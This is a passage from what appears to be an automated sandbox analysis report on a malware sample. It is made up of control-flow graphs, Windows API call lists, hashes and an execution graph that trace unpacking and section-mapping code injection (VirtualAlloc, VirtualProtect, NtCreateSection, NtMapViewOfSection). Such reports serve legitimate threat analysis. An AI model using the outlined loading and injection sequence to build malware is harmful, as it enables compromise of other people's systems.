                                                control_flow_graph 483 4030b2-4030d0 485 4030d3-4030fc 483->485 486 403094-4030b1 NtTerminateProcess 483->486 490 403104-403109 485->490 491 4030fe 485->491 492 403112-403134 call 40118b 490->492 493 40310b 490->493 491->490 494 403100-403102 491->494 500 403138 492->500 493->492 495 40310d-403110 493->495 495->492 500->500
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: ProcessTerminate
                                                • String ID:
                                                • API String ID: 560597551-0
                                                • Opcode ID: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
                                                • Instruction ID: 842373eb4463ac9e834e9e22d1360699520a6be1e431551352f4b65e49395860
                                                • Opcode Fuzzy Hash: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
                                                • Instruction Fuzzy Hash: BA018E3360D01556C71C9A7848012F56F56D784321F34413BE1566B5D7D63E8A0B5587

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 65 4a003c-4a0047 66 4a0049 65->66 67 4a004c-4a0263 call 4a0a3f call 4a0e0f call 4a0d90 VirtualAlloc 65->67 66->67 82 4a028b-4a0292 67->82 83 4a0265-4a0289 call 4a0a69 67->83 84 4a02a1-4a02b0 82->84 86 4a02ce-4a03c2 VirtualProtect call 4a0cce call 4a0ce7 83->86 84->86 87 4a02b2-4a02cc 84->87 94 4a03d1-4a03e0 86->94 87->84 95 4a0439-4a04b8 VirtualFree 94->95 96 4a03e2-4a0437 call 4a0ce7 94->96 98 4a04be-4a04cd 95->98 99 4a05f4-4a05fe 95->99 96->94 103 4a04d3-4a04dd 98->103 100 4a077f-4a0789 99->100 101 4a0604-4a060d 99->101 105 4a078b-4a07a3 100->105 106 4a07a6-4a07b0 100->106 101->100 107 4a0613-4a0637 101->107 103->99 104 4a04e3-4a0505 103->104 116 4a0517-4a0520 104->116 117 4a0507-4a0515 104->117 105->106 109 4a086e-4a08be LoadLibraryA 106->109 110 4a07b6-4a07cb 106->110 111 4a063e-4a0648 107->111 115 4a08c7-4a08f9 109->115 113 4a07d2-4a07d5 110->113 111->100 114 4a064e-4a065a 111->114 118 4a07d7-4a07e0 113->118 119 4a0824-4a0833 113->119 114->100 120 4a0660-4a066a 114->120 121 4a08fb-4a0901 115->121 122 4a0902-4a091d 115->122 123 4a0526-4a0547 116->123 117->123 124 4a07e2 118->124 125 4a07e4-4a0822 118->125 127 4a0839-4a083c 119->127 126 4a067a-4a0689 120->126 121->122 128 4a054d-4a0550 123->128 124->119 125->113 129 4a068f-4a06b2 126->129 130 4a0750-4a077a 126->130 127->109 131 4a083e-4a0847 127->131 133 4a05e0-4a05ef 128->133 134 4a0556-4a056b 128->134 135 4a06ef-4a06fc 129->135 136 4a06b4-4a06ed 129->136 130->111 137 4a084b-4a086c 131->137 138 4a0849 131->138 133->103 139 4a056f-4a057a 134->139 140 4a056d 134->140 141 4a074b 135->141 142 4a06fe-4a0748 135->142 136->135 137->127 138->109 143 4a059b-4a05bb 139->143 144 4a057c-4a0599 139->144 140->133 141->126 142->141 149 4a05bd-4a05db 143->149 144->149 149->128
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004A024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction ID: e8808fda1f18410e8add9b7d654e39f1dace8b15439fa6e8a781bb971e8400d6
                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction Fuzzy Hash: 74527874A01229DFDB64CF58C984BA8BBB1BF09304F1480DAE90DAB351DB34AE95DF15

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 425 41aa64-41aa6b 426 41aa70-41aa80 425->426 427 41aa82 426->427 428 41aa87-41aa8a 426->428 427->428 428->426 429 41aa8c-41aaaf LoadLibraryW call 41a5c0 call 41a730 428->429 434 41aab0-41aab7 429->434 435 41aab9-41aac9 GlobalSize 434->435 436 41aacd-41aad3 434->436 435->436 437 41aad5 call 41a5b0 436->437 438 41aada-41aae1 436->438 437->438 441 41aae3-41aae8 InterlockedDecrement 438->441 442 41aaee-41aaf5 438->442 441->442 442->434 443 41aaf7-41ab05 442->443 444 41ab07-41ab0c 443->444 445 41ab16-41ab1c 444->445 446 41ab0e-41ab14 444->446 445->444 447 41ab1e-41ab32 445->447 446->445 446->447
                                                APIs
                                                • LoadLibraryW.KERNELBASE(0041CA54), ref: 0041AA91
                                                • GlobalSize.KERNEL32(00000000), ref: 0041AABB
                                                • InterlockedDecrement.KERNEL32(?), ref: 0041AAE8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778740954.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: DecrementGlobalInterlockedLibraryLoadSize
                                                • String ID: k`$}$
                                                • API String ID: 2499385582-956986773
                                                • Opcode ID: 90d5a7ab82ba47ca7eb1b4750a0015e3dea80a490ed384338c8ca6549050b500
                                                • Instruction ID: fcda37833e7166e974b459af4bde307c7f2281d154bce7f8072bdce0eb6676ce
                                                • Opcode Fuzzy Hash: 90d5a7ab82ba47ca7eb1b4750a0015e3dea80a490ed384338c8ca6549050b500
                                                • Instruction Fuzzy Hash: E31127346892508AC624A760DD457EBB761EF58356F11403FE646822A1CA7854E1CBDF

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 480 4a0e0f-4a0e24 SetErrorMode * 2 481 4a0e2b-4a0e2c 480->481 482 4a0e26 480->482 482->481
                                                APIs
                                                • SetErrorMode.KERNELBASE(00000400,?,?,004A0223,?,?), ref: 004A0E19
                                                • SetErrorMode.KERNELBASE(00000000,?,?,004A0223,?,?), ref: 004A0E1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: 4a69a7ed93f9a29727daf5d7a921b2a81f6fc96308f2a7e4260770afe9c2796a
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: F8D0123114512877DB002A94DC09BCE7B1CDF09B62F008411FB0DDD180C774994046E9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 501 41a5c0-41a5e1 VirtualProtect
                                                APIs
                                                • VirtualProtect.KERNELBASE(00421D18,00421ECC,00000040,?), ref: 0041A5D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778740954.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 659ae115ffa24a0ab265ce8b874561e83131cef61aa53958ed046fde09d19cf0
                                                • Instruction ID: fb7c44a773a415b676b39fc02758dbf11eb15df709cce15dc9b7056abff92ea5
                                                • Opcode Fuzzy Hash: 659ae115ffa24a0ab265ce8b874561e83131cef61aa53958ed046fde09d19cf0
                                                • Instruction Fuzzy Hash: 47D0A9B820020CABC210CB40EC41E22736CD788200B004268BE0C43260E671B90186A8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 502 401869-4018cc call 40110f Sleep call 40138a 516 4018db-40192a call 40110f 502->516 517 4018ce-4018d6 call 401493 502->517 517->516
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
                                                • Instruction ID: c749d285b2de24fc316c817c7ae4fe8e6badb8f794917fcf5296f62f9050bee9
                                                • Opcode Fuzzy Hash: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
                                                • Instruction Fuzzy Hash: BA117C72A0C208EBE600BA949C42E7A3259AB41755F348037BA07790F0D67D9B13B72B
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
                                                • Instruction ID: b17aa293f10861f930621d71b3cc53cbab5e3b4d2edd5f2ed28ca100fb2eaa3d
                                                • Opcode Fuzzy Hash: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
                                                • Instruction Fuzzy Hash: 2C010472A0C245EBEB00ABA09C4297933659F00305F248477B606790F1D57D8712F71B
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
                                                • Instruction ID: b8c0f1a70be89906461d65cd061911ad83e0312d7227b68f91b7eb194a97aeae
                                                • Opcode Fuzzy Hash: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
                                                • Instruction Fuzzy Hash: CA015A7260C205EBEB01AA909C42A7A3215AB45355F248437BA17790F1C67D8A53F71B
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
                                                • Instruction ID: be550ea8b7a21d6326383ffce51d2b737e5c9e0a4d996b68b29bd2ffee87f150
                                                • Opcode Fuzzy Hash: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
                                                • Instruction Fuzzy Hash: 32014F7260C205EBEB01AA909D41A7E3255AF45315F248437BA17790F1C67D8653F71B
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005370BE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, Offset: 00534000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_534000_e0OOofAl0S.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction ID: 1d8c73d436b330b56d1dd86a12c404ad10e58c9285af47845f6568aa4169d216
                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction Fuzzy Hash: CE113C79A00208EFDB01DF98C989E98BFF5AF08750F058094F9489B362D771EA50DF90
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
                                                • Instruction ID: 2ebc05d28c21af2a54c4caf66b99915bed587d393384b69dc5fa06e125dea622
                                                • Opcode Fuzzy Hash: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
                                                • Instruction Fuzzy Hash: 50018F7260C205EBEB01AA909C41A7E3315AB45311F208437BA06790F1C67D8712F71B
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                  • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                  • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: CreateDuplicateObjectSectionSleep
                                                • String ID:
                                                • API String ID: 4152845823-0
                                                • Opcode ID: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
                                                • Instruction ID: 055aca88afb56c34d21ecc05ae408393a65145e0cd4b89ba36dd333808a7ed44
                                                • Opcode Fuzzy Hash: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
                                                • Instruction Fuzzy Hash: C401627260C205EBEB01AA909D51A6E3355AF45351F208437BA16790F1C67D8652F71B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$GetProcAddress.$l
                                                • API String ID: 0-2784972518
                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction ID: 032ae2445adcf9355ce1446b617a316a088ca6d6551e263125d157b1bbfe86d2
                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction Fuzzy Hash: C1315AB6900609DFEB10CF99C880AAEBBF9FF59324F24404AD441A7311D775EA45CBA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3ef201b7eb768e6bc6555ba41f306de6eccaabbf2ee15fcfb797bfe8dfe952b
                                                • Instruction ID: a09514af2055564550f595cc5d6a75831b1b25344ca6e403bf9184f71b25bcd9
                                                • Opcode Fuzzy Hash: f3ef201b7eb768e6bc6555ba41f306de6eccaabbf2ee15fcfb797bfe8dfe952b
                                                • Instruction Fuzzy Hash: 972106729982409EDF559FB4C9870C27F71BE137387B41BACC4518B273CAA69113CB22
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, Offset: 00534000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_534000_e0OOofAl0S.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction ID: 17d7edd17fc8a37dc12fb4c334e1316e6f8f39dc235f1c8892ab4e9a6e1dc802
                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction Fuzzy Hash: A3118B72340105AFDB44DF55DC81FA677EAFB89360B298069ED08CB316E676EC02C760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
                                                • Instruction ID: ac47c9089ab74bbd4744f5430c59f4e61b9adfdf7c8bba648fb7bf2dae8000a3
                                                • Opcode Fuzzy Hash: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
                                                • Instruction Fuzzy Hash: 10115A2049D3C05BC3878B7CD595483BFA47D1B230B5A55EED8C24F963C394A925D3A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
                                                • Instruction ID: beffa67a2295d3531f69e7eb1ca379527f1e68ad246f0e50b83cf55ac921e291
                                                • Opcode Fuzzy Hash: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
                                                • Instruction Fuzzy Hash: 3411222049D3C05AC3838B7CD295483BF647E1B230B9A95EED8C24F923C345A926D3A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
                                                • Instruction ID: c6b7842e347cac63059ed32f1a386f80ec7c31cd39de27a6132647ed699d03ea
                                                • Opcode Fuzzy Hash: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
                                                • Instruction Fuzzy Hash: BE019D0526E3D81AC3878B7DC1895877F017D5B13079BA2EEECC18E823C380884AC763
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
                                                • Instruction ID: c6b7842e347cac63059ed32f1a386f80ec7c31cd39de27a6132647ed699d03ea
                                                • Opcode Fuzzy Hash: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
                                                • Instruction Fuzzy Hash: BE019D0526E3D81AC3878B7DC1895877F017D5B13079BA2EEECC18E823C380884AC763
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                • Instruction ID: f80c6bb9db8b12a177546f1768fbe65e944308d77046e0a70fcc83ad7ea6cac1
                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                • Instruction Fuzzy Hash: B101F273A006008FDF21CF60C904BAB33E5EBA7306F0544AAD90A97381E378AD418B84
                                                APIs
                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041A69C
                                                • UnhandledExceptionFilter.KERNEL32(00000000), ref: 0041A6A4
                                                • GetComputerNameW.KERNEL32(?,?), ref: 0041A6F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778740954.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: ComputerExceptionFilterNamePrivateProfileStringUnhandledWrite
                                                • String ID: -
                                                • API String ID: 1470029763-2547889144
                                                • Opcode ID: be8e2e4c92d4aa084a27bf65dbcb5d7ecd1ee3e5d5be1be516bfa36a37aadb6c
                                                • Instruction ID: 4b5e4e4b6f83c94ba78a0dd8dd4ce6fb1df44620f0ca627238bf55da635243b7
                                                • Opcode Fuzzy Hash: be8e2e4c92d4aa084a27bf65dbcb5d7ecd1ee3e5d5be1be516bfa36a37aadb6c
                                                • Instruction Fuzzy Hash: 7711E9319012189BD760DF64DC85BDE77F4FB08310F15C1B9E5D59B180CA745AC58F8A
                                                APIs
                                                • QueryDosDeviceW.KERNEL32(00000000,00000000,00000000,00000000,0041B044,0041AAA1), ref: 0041A74C
                                                • FreeEnvironmentStringsW.KERNEL32(00000000,00000000,0041B044,0041AAA1), ref: 0041A767
                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0041A78A
                                                • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041A792
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1778740954.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_e0OOofAl0S.jbxd
                                                Similarity
                                                • API ID: AllocateDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                • String ID:
                                                • API String ID: 975556166-0
                                                • Opcode ID: fcdbff5d07d9ac415359981b28a3bf4e46d87dbfd96b2b6133518f9cab96085a
                                                • Instruction ID: d58ed8a6e156ce39838269d538da37acbc757045de5b3d1f898b295708f67049
                                                • Opcode Fuzzy Hash: fcdbff5d07d9ac415359981b28a3bf4e46d87dbfd96b2b6133518f9cab96085a
                                                • Instruction Fuzzy Hash: 78F08935781200E7E6306B64EC49B863774EB18713F514032F719961F0C7A459818F5E

                                                Execution Graph

                                                Execution Coverage:9.2%
                                                Dynamic/Decrypted Code Coverage:22.6%
                                                Signature Coverage:0%
                                                Total number of Nodes:212
                                                Total number of Limit Nodes:5
                                                execution_graph 3634 41ab40 3637 41a7a0 3634->3637 3636 41ab45 3638 41a7d3 3637->3638 3639 41a844 6 API calls 3638->3639 3648 41a955 3638->3648 3640 41a8ad 6 API calls 3639->3640 3642 41a922 GetUserDefaultLangID 3640->3642 3641 41a987 GetSystemTimes 3643 41a9ab 3641->3643 3641->3648 3644 41a931 RtlLeaveCriticalSection 3642->3644 3645 41a93c 3642->3645 3646 41a9a9 3643->3646 3647 41a9b4 FoldStringW 3643->3647 3644->3645 3645->3648 3649 41a945 LoadLibraryA 3645->3649 3650 41aa3a GlobalAlloc 3646->3650 3651 41a9ce GetConsoleAliasesLengthA CallNamedPipeA GetComputerNameA GetConsoleAliasExesLengthW 3646->3651 3647->3646 3648->3641 3648->3646 3649->3648 3652 41aa57 3650->3652 3653 41aa8c LoadLibraryW 3650->3653 3660 41aa04 3651->3660 3652->3653 3663 41a5c0 VirtualProtect 3653->3663 3656 41aa9c 3664 41a730 3656->3664 3658 41aab9 GlobalSize 3659 41aaa1 3658->3659 3659->3658 3661 41aae3 InterlockedDecrement 3659->3661 3662 41aaf7 3659->3662 3660->3650 3661->3659 3662->3636 3663->3656 3665 41a752 3664->3665 3666 41a746 QueryDosDeviceW 3664->3666 3675 41a630 3665->3675 3666->3665 3669 41a765 FreeEnvironmentStringsW 3670 41a76d 3669->3670 3678 41a670 3670->3678 3673 41a784 RtlAllocateHeap GetNumaHighestNodeNumber 3674 41a798 3673->3674 3674->3659 3676 41a647 GetStartupInfoA LoadLibraryA 3675->3676 3677 41a659 3675->3677 3676->3677 3677->3669 3677->3670 3679 41a694 WritePrivateProfileStringA UnhandledExceptionFilter 3678->3679 3681 41a6aa 3678->3681 3679->3681 3682 41a702 3681->3682 3683 41a6e9 GetComputerNameW 3681->3683 3684 41a660 3681->3684 3682->3673 3682->3674 3683->3681 3687 41a5f0 3684->3687 3688 41a619 3687->3688 3689 41a60c FindNextChangeNotification 3687->3689 3688->3681 3689->3688 3924 40b187 3925 40b193 3924->3925 3929 40b19b 3925->3929 3932 40b488 3925->3932 3930 40b216 3945 40b243 3930->3945 3933 40b494 3932->3933 3936 40b4c9 InitializeCriticalSectionAndSpinCount 3933->3936 3937 40b4dc ___lock_fhandle 3933->3937 3934 40b202 3934->3930 3938 40b0eb 3934->3938 3935 40b4f3 RtlEnterCriticalSection 3935->3934 3936->3937 3937->3934 3937->3935 3942 40b0fb __close_nolock 3938->3942 3939 40b151 3948 40b399 3939->3948 3942->3939 3943 40b13b CloseHandle 3942->3943 3943->3939 3944 40b147 GetLastError 3943->3944 3944->3939 3952 40b527 RtlLeaveCriticalSection 3945->3952 3947 40b249 3947->3929 3949 40b159 3948->3949 3950 40b3aa 3948->3950 3949->3930 3950->3949 3951 40b3f5 SetStdHandle 3950->3951 3951->3949 3952->3947 3714 402e0b 3716 402e0e 3714->3716 3717 402e9c 3716->3717 3718 401869 3716->3718 3719 401877 3718->3719 3720 4018af Sleep 3719->3720 3721 4018ca 3720->3721 3723 4018db 3721->3723 3724 401493 3721->3724 3723->3717 3725 4014a2 3724->3725 3726 401543 NtDuplicateObject 3725->3726 3733 40165f 3725->3733 3727 401560 NtCreateSection 3726->3727 3726->3733 3728 4015e0 NtCreateSection 3727->3728 3729 401586 NtMapViewOfSection 3727->3729 3731 40160c 3728->3731 3728->3733 3729->3728 3730 4015a9 NtMapViewOfSection 3729->3730 3730->3728 3732 4015c7 3730->3732 3731->3733 3734 401616 